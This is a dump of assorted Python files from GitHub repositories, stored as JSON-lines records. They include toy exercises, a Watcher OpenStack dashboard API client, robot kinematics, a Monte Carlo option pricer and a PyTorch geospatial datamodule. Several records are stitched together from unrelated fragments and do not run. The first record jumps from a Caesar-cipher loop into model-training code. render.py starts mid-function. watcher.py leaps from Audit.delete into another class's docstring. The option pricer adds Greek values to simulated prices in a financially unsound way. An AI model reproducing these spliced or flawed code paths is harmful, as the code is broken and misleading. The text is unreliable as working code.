characters\norginal_encrypted.sort()\nplt.hist(orginal_encrypted)\nplt.xlabel('Character')\nplt.ylabel('Count')\nplt.show()\n\nMIN=1000000000000000000\nshift_key=0\n\nfor i in range(26):\n    squared_distance=distance(i, orginal_encrypted)\n    if(squared_distance<MIN):\n        MIN=squared_distance\n        shift_key=i\n\n        if print_cnt > PRINT_FREQ:\n            print('it {:d} -- loss {:.03f}'.format(it, loss))\n            print_cnt = 0\n\n    torch.save(flow.state_dict(), 'flow_model.pytorch')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--dataset', default='lendingclub', help='dataset to use')\n    parser.add_argument('--batch_size', default=64, type=int, help='batch size')\n    parser.add_argument('--total_it', default=10000, type=int, help='number of training samples')\n    parser.add_argument('--lr', default=1e-4, type=float, help='learning rate')\n\n    args = parser.parse_args(sys.argv[1:])\n\n    if args.dataset == 'lendingclub':\n        x, y, scaler = load_data('lendingclub', is_tree=False, scaler_type='standardize')\n        x = np.concatenate([x, np.zeros(x.shape[0])[:,None]], axis=1)\n    \n    else:\n        x, y = datasets.make_moons(n_samples=30000, noise=0.05)\n        x = x.astype(np.float32)\n\n    train(args, x, y)\n","repo_name":"ekrim/glow","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29675537503","text":"def inputing():\n    score=[]\n    print('please enter the number of subjects')\n    len=int(input('subjects:'))\n    print('please enter students score')\n    for i in range(len):\n        score.append(int(input('subject'+str(i+1)+\"=\")))\n    return score\ndef total():\n    score=inputing()\n    total=0;\n    for i in range(len(score)):\n        total+=score[i]\n    total-=smallest(score)\n    return total,len(score)-1\ndef smallest(score):\n    small=score[0]\n    for i in range(len(score)):\n        if score[i]<small:\n            small=score[i]\n    return small\n\n        if dx >= dy:\n            y = y0\n            for x in range(x0, x1 + 1):\n                # print(x)\n                # print(y)\n                self.glVertexC(x, y)\n\n                if px < 0:\n                    px += 2 * dy\n                else:\n                    y += 1 if y0 < y1 else -1\n                    px += 2 * (dy - dx)\n\n        else:\n            x = x0\n            step = 1 if y0 < y1 else -1\n            for y in range(y0, y1, step):\n                # print(x)\n                # print(y)\n                self.glVertexC(x, y)\n\n                if py < 0:\n                    py += 2 * dx\n                else:\n                    x += 1 if x0 < x1 else -1\n                    py += 2 * (dx - dy)\n\n\n    def display(self, name = 'out'):\n        self.glFinish(name)\n\n        try:\n            from wand.image import Image\n            from wand.display import display\n\n            with Image(filename = name + '.bmp') as image:\n                display(image)\n        except Exception as e:\n            print(e)\n            pass # do nothing if no wand is installed\n","repo_name":"ciborg245/bmp_render","sub_path":"SR2/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055413514","text":"# deque # 10866\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nnum = int(input())\ndeq = deque([])\ncount = 0\nfor i in range(num):\n    order=input().split()\n    if order[0] == \"push_back\":\n        deq.append(int(order[1]))\n        count+=1\n    elif order[0] == \"push_front\":\n        deq.appendleft(int(order[1]))\n        count+=1\n    elif order[0] == \"front\":\n        if count==0:\n            print(-1)\n        else:\n            print(deq[0])\n    elif order[0] == \"back\":\n        if count==0:\n            print(-1)\n        else:\n            print(deq[-1])\n    elif order[0] == \"size\":\n        print(count)\n    elif order[0] == \"empty\":\n        if count==0:\n            print(1)\n        else:\n            print(0)\n    elif order[0] == \"pop_front\":\n        if count == 0:\n            print(-1)\n        else:\n            print(deq.popleft())\n            count -= 1\n    elif order[0] == \"pop_back\":\n        
if count == 0:\n print(-1)\n else:\n print(deq.pop())\n count -= 1","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[deque]/[deque]Deque.py","file_name":"[deque]Deque.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70399030829","text":"# Partition List - https://leetcode.com/problems/partition-list/\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n left = dummy\n dummy_right = ListNode(0)\n right = dummy_right\n while head is not None:\n node = ListNode(head.val)\n if node.val < x:\n left.next = node\n left = node\n else:\n right.next = node\n right = node\n head = head.next\n left.next = dummy_right.next\n return dummy.next","repo_name":"igorsubbotin/leetcode_python","sub_path":"problem_086.py","file_name":"problem_086.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44315735496","text":"#!/usr/bin/env python3\n#\n# User Date(dd/mm/yyyy) Description \n# -----------------------------------------------------------------------------------------------------------------\n# Suryakant Baluni 21/10/2023 Randomly generate a number between 1-10.\n# Ask user to guess the number.\n# Give user 3 attempts to guess the number.\n# If user guesses correct number then print \"You win!!!\" and exit program.\n# If all 3 attempts failed then print \"You lose.\"\n\nimport random\nrand_num = random.randint(1, 10)\nprint(rand_num)\nfor i in range(1,4):\n choice = int(input(\"Guess the number(1-10):\"))\n if choice == rand_num:\n print(\"You win!!!\")\n break\n else:\n print(\"Wrong answer. Please try again.\")\nelse:\n print(f\"You lose. 
Correct answer is {rand_num}\")\n\n","repo_name":"sbaluni/python","sub_path":"Unit_04(Randomisation)/prg_03_guess_the_number.py","file_name":"prg_03_guess_the_number.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38724081091","text":"import os\n\nfrom Exchanges.binance.binance import BinanceFutures, BinanceSpot\nfrom Exchanges.bitmex import BitmexClient\nfrom Exchanges.bybit import BybitClient\nfrom Exchanges.ftx.ftx import FtxClient\nfrom Exchanges.kucoin import KuCoinClient\nfrom Exchanges.okx.okx import OkxClient\n\nPREFIX = \"c \"\nDATA_PATH = \"data/\"\nARCHIVE_PATH = \"archive/\"\nFETCHING_INTERVAL_HOURS = 1\nREKT_THRESHOLD = 0.5\nREGISTRATION_MINIMUM = 1\nREKT_MESSAGES = [\n \"{name} hat sich mit der Leverage vergriffen :cry:\",\n \"{name} gone **REKT**!\",\n \"{name} hat den SL vergessen...\"\n]\n# Channels where the Rekt Messages are sent\nREKT_GUILDS = [\n # Bot-Test\n {\n \"guild_id\": 916370614598651934,\n \"guild_channel\": 917146534372601886\n },\n # Next Level\n {\n \"guild_id\": 443583326507499520,\n \"guild_channel\": 704403630375305317\n }\n]\nCURRENCY_PRECISION = {\n '$': 2,\n 'USD': 2,\n '%': 2,\n 'BTC': 6,\n 'XBT': 6,\n 'ETH': 4\n}\nCURRENCY_ALIASES = {\n 'BTC': 'XBT',\n 'XBT': 'BTC',\n 'USD': '$'\n}\nEXCHANGES = {\n 'binance-futures': BinanceFutures,\n 'binance-spot': BinanceSpot,\n 'bitmex': BitmexClient,\n 'ftx': FtxClient,\n 'kucoin': KuCoinClient,\n 'bybit': BybitClient,\n 'okx': OkxClient\n}\n\nLOG_OUTPUT_DIR = \"LOGS/\"\nTESTING = os.environ.get('TESTING') == 'True'\n\n","repo_name":"jackstar12/balance-bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7906940757","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom openstack_dashboard.api import base\nfrom watcherclient import client as wc\n\nfrom watcher_dashboard.utils import errors as errors_utils\n\nLOG = logging.getLogger(__name__)\nWATCHER_SERVICE = 'infra-optim'\n\n\ndef watcherclient(request, password=None):\n api_version = \"1\"\n insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)\n ca_file = getattr(settings, 'OPENSTACK_SSL_CACERT', None)\n insert_watcher_policy_file()\n\n endpoint = base.url_for(request, WATCHER_SERVICE)\n\n LOG.debug('watcherclient connection created using token \"%s\" and url \"%s\"'\n % (request.user.token.id, endpoint))\n\n client = wc.get_client(\n api_version,\n watcher_url=endpoint,\n insecure=insecure,\n ca_file=ca_file,\n username=request.user.username,\n password=password,\n os_auth_token=request.user.token.id\n )\n return client\n\n\ndef insert_watcher_policy_file():\n policy_files = getattr(settings, 'POLICY_FILES', {})\n policy_files['infra-optim'] = 'watcher_policy.json'\n setattr(settings, 'POLICY_FILES', policy_files)\n\n\nclass Audit(base.APIDictWrapper):\n _attrs = ('uuid', 'name', 'created_at', 'modified_at', 'deleted_at',\n 'state', 'audit_type', 'audit_template_uuid',\n 'audit_template_name', 'interval')\n\n def __init__(self, apiresource, request=None):\n super(Audit, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def create(cls, request, audit_template_uuid, audit_type, name=None,\n auto_trigger=False, interval=None):\n\n \"\"\"Create an audit in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_template_uuid: related audit template UUID\n :type audit_template_uuid: string\n\n :param audit_type: audit type\n :type audit_type: string\n\n :param interval: Audit interval (default: None)\n :type interval: int\n\n :param name: Name for this audit\n :type name: string\n\n :return: the created Audit object\n :rtype: :py:class:`~.Audit`\n \"\"\"\n\n if interval:\n return watcherclient(request).audit.create(\n audit_template_uuid=audit_template_uuid, audit_type=audit_type,\n auto_trigger=auto_trigger, interval=interval, name=name)\n else:\n return watcherclient(request).audit.create(\n audit_template_uuid=audit_template_uuid, audit_type=audit_type,\n auto_trigger=auto_trigger, name=name)\n\n @classmethod\n def list(cls, request, **filters):\n \"\"\"Return a list of audits in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of audits, or an empty list if there are none\n :rtype: list of :py:class:`~.Audit`\n \"\"\"\n return watcherclient(request).audit.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_(\"Unable to retrieve audit\"))\n def get(cls, request, audit_id):\n \"\"\"Return the audit that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param audit_id: id of audit to be retrieved\n :type audit_id: int\n\n :return: matching audit, or None if no audit matches\n the ID\n :rtype: :py:class:`~.Audit`\n \"\"\"\n return watcherclient(request).audit.get(audit=audit_id)\n\n @classmethod\n def delete(cls, request, audit_id):\n \"\"\"Delete an audit\n\n :param request: request object\n :type request: 
django.http.HttpRequest\n\n        :param name: Name for this audit template\n        :type name: string\n\n        :param goal: Goal UUID or name associated to this audit template\n        :type goal: string\n\n        :param strategy: Strategy UUID or name associated to this audit\n                         template\n        :type strategy: string\n\n        :param description: Description of the audit template\n        :type description: string\n\n        :param scope: Audit scope\n        :type scope: list of list of dict\n\n        :return: the created Audit Template object\n        :rtype: :py:class:`~.AuditTemplate`\n        \"\"\"\n        audit_template = watcherclient(request).audit_template.create(\n            name=name,\n            goal=goal,\n            strategy=strategy,\n            description=description,\n            scope=scope,\n        )\n\n        return audit_template\n\n    @classmethod\n    def patch(cls, request, audit_template_id, parameters):\n        \"\"\"Update an audit template in Watcher\n\n        :param request: request object\n        :type request: django.http.HttpRequest\n\n        :param audit_template_id: id of the audit template we want to update\n        :type audit_template_id: string\n\n        :param parameters: new values for the audit template's parameters\n        :type parameters: dict\n\n        :return: the updated Audit Template object\n        :rtype: :py:class:`~.AuditTemplate`\n        \"\"\"\n        parameter_list = [{\n            'name': str(name),\n            'value': str(value),\n        } for (name, value) in parameters.items()]\n        audit_template = watcherclient(request).audit_template.patch(\n            audit_template_id, parameter_list)\n        return audit_template\n\n    @classmethod\n    def list(cls, request, **filters):\n        \"\"\"Return a list of audit templates in Watcher\n\n        :param request: request object\n        :type request: django.http.HttpRequest\n\n        :param filters: key/value kwargs used as filters\n        :type filters: dict\n\n        :return: list of audit templates, or an empty list if there are none\n        :rtype: list of :py:class:`~.AuditTemplate`\n        \"\"\"\n        return watcherclient(request).audit_template.list(\n            detail=True, **filters)\n\n    @classmethod\n    @errors_utils.handle_errors(_(\"Unable to retrieve audit template\"))\n    def get(cls, request, audit_template_id):\n        \"\"\"Return the audit template that matches the ID\n\n        :param request: request object\n        :type request: django.http.HttpRequest\n\n        :param audit_template_id: id of audit template to be retrieved\n        :type audit_template_id: int\n\n        :return: matching audit template, or None if no audit template matches\n                 the ID\n        :rtype: :py:class:`~.AuditTemplate`\n        \"\"\"\n        return watcherclient(request).audit_template.get(\n            audit_template_id=audit_template_id)\n\n    @classmethod\n    def delete(cls, request, audit_template_id):\n        \"\"\"Delete an audit_template\n\n        :param request: request object\n        :type request: django.http.HttpRequest\n\n        :param audit_template_id: audit template id\n        :type audit_template_id: int\n        \"\"\"\n        
watcherclient(request).audit_template.delete(\n audit_template_id=audit_template_id)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass ActionPlan(base.APIDictWrapper):\n _attrs = ('uuid', 'created_at', 'updated_at', 'deleted_at',\n 'audit_uuid', 'state')\n\n def __init__(self, apiresource, request=None):\n super(ActionPlan, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n """Return a list of action plans in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of action plans, or an empty list if there are none\n :rtype: list of :py:class:`~.ActionPlan`\n """\n return watcherclient(request).action_plan.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_("Unable to retrieve action plan"))\n def get(cls, request, action_plan_id):\n """Return the action plan that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: id of action plan to be retrieved\n :type action_plan_id: int\n\n :return: matching action plan, or None if no action plan matches\n the ID\n :rtype: :py:class:`~.ActionPlan`\n """\n return watcherclient(request).action_plan.get(\n action_plan_id=action_plan_id)\n\n @classmethod\n def delete(cls, request, action_plan_id):\n """Delete an action plan\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: action plan id\n :type action_plan_id: int\n """\n watcherclient(request).action_plan.delete(\n action_plan_id=action_plan_id)\n\n @classmethod\n def start(cls, request, action_plan_id):\n """Start an Action Plan\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_plan_id: action plan id\n :type action_plan_id: int\n """\n watcherclient(request).action_plan.start(action_plan_id)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Action(base.APIDictWrapper):\n _attrs = ('uuid', 'created_at', 'updated_at', 'deleted_at', 'next_uuid',\n 'description', 'state', 'action_plan_uuid',\n 'action_type', 'applies_to', 'src', 'dst', 'parameter')\n\n def __init__(self, apiresource, request=None):\n super(Action, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n """Return a list of actions in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of actions, or an empty list if there are none\n :rtype: list of :py:class:`~.Action`\n """\n return watcherclient(request).action.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_("Unable to retrieve action"))\n def get(cls, request, action_id):\n """Return the action that matches the ID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: id of action to be retrieved\n :type action_id: int\n\n :return: matching action, or None if no action matches\n the ID\n :rtype: :py:class:`~.Action`\n """\n return watcherclient(request).action.get(action_id=action_id)\n\n @classmethod\n def delete(cls, request, action_id):\n """Delete an action\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: action id\n :type action_id: int\n """\n 
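# usage sketch (the UUID below is a placeholder for illustration only):\n # Action.delete(request, action_id='<action-uuid>')\n 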
watcherclient(request).action.delete(\n action_id=action_id)\n\n @classmethod\n def start(cls, request, action_id):\n """Start an Action\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param action_id: action id\n :type action_id: int\n """\n patch = []\n patch.append({'op': 'replace', 'path': '/state', 'value': 'PENDING'})\n watcherclient(request).action.update(action_id, patch)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Goal(base.APIDictWrapper):\n """Goal resource."""\n\n _attrs = ('uuid', 'name', 'display_name', 'created_at',\n 'updated_at', 'deleted_at', 'efficacy_specifications')\n\n def __init__(self, apiresource, request=None):\n super(Goal, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n """Return a list of goals in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of goals, or an empty list if there are none\n :rtype: list of :py:class:`~.Goal` instance\n """\n return watcherclient(request).goal.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_("Unable to retrieve goal"))\n def get(cls, request, goal):\n """Return the goal that matches the UUID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param goal: uuid of goal to be retrieved\n :type goal: string\n\n :return: matching goal, or None if no goal matches the UUID\n :rtype: :py:class:`~.Goal` instance\n """\n return watcherclient(request).goal.get(goal)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass Strategy(base.APIDictWrapper):\n """Strategy resource."""\n\n _attrs = ('uuid', 'name', 'display_name', 'goal_uuid', 'goal_name',\n 'created_at', 'updated_at', 'deleted_at')\n\n def __init__(self, apiresource, request=None):\n super(Strategy, self).__init__(apiresource)\n self._request = request\n\n @classmethod\n def list(cls, request, **filters):\n """Return a list of strategies in Watcher\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param filters: key/value kwargs used as filters\n :type filters: dict\n\n :return: list of strategies, or an empty list if there are none\n :rtype: list of :py:class:`~.Strategy` instances\n """\n return watcherclient(request).strategy.list(detail=True, **filters)\n\n @classmethod\n @errors_utils.handle_errors(_("Unable to retrieve strategy"))\n def get(cls, request, strategy):\n """Return the strategy that matches the UUID\n\n :param request: request object\n :type request: django.http.HttpRequest\n\n :param strategy: uuid of strategy to be retrieved\n :type strategy: str\n\n :return: matching strategy, or None if no strategy matches the UUID\n :rtype: :py:class:`~.Strategy` instance\n """\n return watcherclient(request).strategy.get(strategy)\n\n @property\n def id(self):\n return self.uuid\n\n\nclass EfficacyIndicatorSpec(base.APIDictWrapper):\n\n _attrs = ('name', 'description', 'unit', 'schema')\n\n\nclass EfficacyIndicator(base.APIDictWrapper):\n\n def __init__(self, indicator):\n super(EfficacyIndicator, self).__init__(indicator)\n self.value = getattr(indicator, 'value', None)\n self.name = getattr(indicator, 'name', None)\n self.description = getattr(indicator, 'description', None)\n self.unit = getattr(indicator, 'unit', 
None)\n","repo_name":"openstack/watcher-dashboard","sub_path":"watcher_dashboard/api/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":16321,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"42913546276","text":"import math\nimport numpy as np\n\n\n\ndef dh_transformation(Ai, # link length \n ai, # link twist\n Di, # link offset\n Ti # joint angle\n ):\n \n # pass the DH params into desired transformation\n transformation = np.array([[math.cos(Ti), -math.sin(Ti) * math.cos(ai), math.sin(Ti) * math.sin(ai), Ai * math.cos(Ti)],\n [math.sin(Ti), math.cos(Ti) * math.cos(ai), -math.cos(Ti) * math.sin(ai), Ai * math.sin(Ti)],\n [0, math.sin(ai), math.cos(ai), Di ],\n [0, 0, 0, 1 ]])\n \n # return the transformation\n return transformation\n\n\ndef kinematic_chain(DH1, DH2):\n # initialize total transformation\n TT = np.identity(4) \n \n # loop through the transformation matrices to multiply them\n for i in range(4):\n for j in range(4):\n TT[i][j] = (DH1[i][0]*DH2[0][j]) + (DH1[i][1]*DH2[1][j]) + (DH1[i][2]*DH2[2][j]) + (DH1[i][3]*DH2[3][j])\n \n # return the resulting transformation\n return TT\n \n\n\ndef get_pos(trans):\n # get x coord\n x = trans[0][3] \n # get y coord \n y = trans[1][3] \n # get z coord \n z = trans[2][3] \n \n # return the xyz coordinates\n return [x,y,z] \n\n\ndef get_rot(trans):\n # get roll\n roll = math.atan(trans[2][1]/trans[2][2])\n # get pitch \n pitch = math.atan(-trans[2][0]/(math.sqrt(trans[2][1]**2+trans[2][2]**2))) \n # get yaw \n yaw = math.atan(trans[1][0]/trans[0][0]) \n \n # return the roll, pitch and yaw\n return [roll, pitch, yaw] ","repo_name":"mattb19/lab3","sub_path":"robot_model.py","file_name":"robot_model.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70330786294","text":"with open(\"input.txt\", \"r\") as f:\n planetlist = {planet[4:7]: planet[:3] for planet in f.readlines()}\n orbitcount = 0\n\nfor planet in planetlist:\n while planet != \"COM\":\n orbitcount += 1\n planet = planetlist[planet]\n\nprint(orbitcount)","repo_name":"AyaPK/advent-of-code","sub_path":"2019/day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"810112641","text":"import sys\nimport re\n\noffset_re = re.compile(r\"#(\\d+) @ (\\d+),(\\d+): (\\d+)x(\\d+)\")\n\n\ndef get_offset_dimensions(line):\n groups = offset_re.findall(line)\n return groups[0]\n\n\ndef overlapping(fabric, x_offset, y_offset, width, height):\n for row in range(height):\n for col in range(width):\n if fabric[row + y_offset][col + x_offset] == \"X\":\n return True\n return False\n\n\ndef main(filename):\n fabric = []\n for i in range(1000):\n fabric.append([])\n for j in range(1000):\n fabric[i].append(\".\")\n claims = []\n with open(filename, \"r\") as fp:\n for line in fp:\n claim_id, x_offset, y_offset, width, height = list(\n map(int, get_offset_dimensions(line))\n )\n claims.append((claim_id, x_offset, y_offset, width, height))\n for row in range(height):\n for col in range(width):\n y = row + y_offset\n x = col + x_offset\n cell = fabric[y][x]\n if cell == \".\":\n fabric[y][x] = \"#\"\n else:\n fabric[y][x] = \"X\"\n for claim_id, x_offset, y_offset, width, height in claims:\n if not overlapping(fabric, x_offset, y_offset, width, height):\n print(claim_id)\n\n\nif __name__ == 
\"__main__\":\n main(sys.argv[1])\n","repo_name":"volker48/aoc2018","sub_path":"day3_part2.py","file_name":"day3_part2.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8248223657","text":"import numpy as np\n\n# Input Option Greek values\ndelta = 0.5\ngamma = 0.1\ntheta = -0.02\nvega = 0.03\nrho = 0.01\n\n# Other input parameters\nspot_price = 100\nstrike_price = 110\nvolatility = 0.2\ninterest_rate = 0.05\ntime_to_expiration = 1\n\n# Number of simulations\nnum_simulations = 10000\n\n# Generate random numbers for the simulations\nnp.random.seed(0)\nrand1 = np.random.normal(0, 1, num_simulations)\nrand2 = np.random.normal(0, 1, num_simulations)\n\n# Simulate the price of the underlying asset at expiration\nprice_at_expiration = spot_price * np.exp((interest_rate - (volatility ** 2) / 2) * time_to_expiration + volatility * np.sqrt(time_to_expiration) * rand1)\n\n# Calculate the payoff at expiration\npayoff_at_expiration = np.maximum(price_at_expiration - strike_price, 0)\n\n# Simulate the option price at time 0\nprice_at_time_0 = payoff_at_expiration * np.exp(-interest_rate * time_to_expiration)\n\n# Add the Greek value perturbations\nprice_at_time_0 += delta * (price_at_expiration - spot_price) + gamma * (price_at_expiration - spot_price) ** 2 + theta * time_to_expiration + vega * rand2 + rho * interest_rate\n\n# Calculate the average option price\noption_price = np.mean(price_at_time_0)\n\nprint(\"Option price: \", option_price)\n\n\n\n","repo_name":"PsychedelicBull/MonteCarloSim1greekarguments","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27166611593","text":"from typing import Any, Callable, Dict, Optional, cast\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport segmentation_models_pytorch as smp\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom pytorch_lightning.core.datamodule import LightningDataModule\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torch import Tensor\nfrom torch.nn.modules import Module\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import Compose\n\nfrom torchgeo.datasets import EnviroAtlas\nfrom torchgeo.datasets.utils import stack_samples\nfrom torchgeo.samplers.single import GridGeoSampler\nfrom torchgeo.samplers.batch import RandomBatchGeoSampler\n\nclass EnviroatlasLearnPriorDataModule(LightningDataModule):\n \"\"\"LightningDataModule implementation for the Enviroatlas dataset.\n\n Uses the random splits defined per state to partition tiles into train, val,\n and test sets.\n \"\"\"\n\n def __init__(\n self,\n root_dir: str,\n states_str: str,\n classes_keep: list,\n patches_per_tile: int = 200,\n patch_size: int = 128,\n batch_size: int = 64,\n num_workers: int = 4,\n onehot_encode_labels: bool = False,\n nlcd_blur_kernelsize: int = 101,\n nlcd_blur_sigma: int = 31,\n train_set: str = \"train\",\n val_set: str = \"val\",\n test_set: str = \"test\",\n **kwargs: Any,\n ) -> None:\n \"\"\"Initialize a LightningDataModule for Enviroatlas based DataLoaders.\n\n Args:\n root_dir: The ``root`` arugment to pass to the Enviroatlas Dataset\n classes\n states_str: The states to use to train the model, concatenated with '+'\n patches_per_tile: The number of patches per tile to 
sample\n            batch_size: The batch size to use in all created DataLoaders\n            num_workers: The number of workers to use in all created DataLoaders\n            patch_size: size of each instance in the batch, in pixels\n            classes_keep: list of valid classes for the prediction problem\n            onehot_encode_labels: whether to one-hot encode the labels for training,\n                will depend on your loss function\n            nlcd_blur_kernelsize: kernel computation extent; parameter in pixels\n            nlcd_blur_sigma: standard deviation of Gaussian blur, in pixels\n            train_set: Set to train on\n            val_set: Set to validate on\n            test_set: Set to test on\n        \"\"\"\n        super().__init__()  # type: ignore[no-untyped-call]\n\n        states = states_str.split(\"+\")\n        for state in states:\n            assert state in [\n                \"pittsburgh_pa-2010_1m\",\n                \"durham_nc-2012_1m\",\n                \"austin_tx-2012_1m\",\n                \"phoenix_az-2010_1m\",\n            ]\n        \n        if nlcd_blur_kernelsize != 101 or nlcd_blur_sigma != 31:\n            print(f'current dataset does not support kernelsize {nlcd_blur_kernelsize} with ' +\n                  f'blur sigma {nlcd_blur_sigma}')\n\n        self.root_dir = root_dir\n        self.layers = [\n            \"prior_no_osm_no_buildings\",\n            \"buildings\",\n            \"roads\",\n            \"waterbodies\",\n            \"waterways\",\n            \"lc\",\n        ]\n\n        self.num_nlcd_layers = 5\n        self.patches_per_tile = patches_per_tile\n        self.patch_size = patch_size\n        self.original_patch_size = patch_size * 3\n        self.batch_size = batch_size\n        self.num_workers = num_workers\n        self.onehot_encode_labels = onehot_encode_labels\n        \n        print('patch size = ',patch_size)\n        print('batch size = ',batch_size)\n        print('patches_per_tile = ',patches_per_tile)\n\n        self.classes_keep = classes_keep\n        self.ignore_index = len(classes_keep)\n\n        # if the prior is to be used, use it as input layer, not output supervision\n        # unless you modify the code, the prior will not be used at all\n        self.prior_as_input = True\n\n        self.train_sets = [f\"{state}-{train_set}\" for state in states]\n        self.val_sets = [f\"{state}-{val_set}\" for state in states]\n        self.test_sets = [f\"{state}-{test_set}\" for state in states]\n        print(f\"train sets are: {self.train_sets}\")\n        print(f\"val sets are: {self.val_sets}\")\n        print(f\"test sets are: {self.test_sets}\")\n\n    def pad_to(\n        self, size: int = 512, image_value: int = 0, mask_value: int = 0\n    ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n        \"\"\"Returns a function to perform a padding transform on a single sample.\n        Args:\n            size: output image size\n            image_value: value to pad image with\n            mask_value: value to pad mask with\n        Returns:\n            function to perform padding\n        \"\"\"\n\n        def pad_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n            _, height, width = sample[\"image\"].shape\n            assert height <= size and width <= size\n\n            height_pad = size - height\n            width_pad = size - width\n\n            # See https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html\n            # for a description of the format of the padding tuple\n            sample[\"image\"] = F.pad(\n                sample[\"image\"],\n                (0, width_pad, 0, height_pad),\n                mode=\"constant\",\n                value=image_value,\n            )\n            sample[\"mask\"] = F.pad(\n                sample[\"mask\"],\n                (0, width_pad, 0, height_pad),\n                mode=\"constant\",\n                value=mask_value,\n            )\n            return sample\n\n        return pad_inner\n\n    def center_crop(\n        self, size: int = 512\n    ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n        \"\"\"Returns a function to perform a center crop transform on a single sample.\n        Args:\n            size: output image size\n        Returns:\n            function to perform center crop\n        \"\"\"\n\n        def center_crop_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n            _, height, width = 
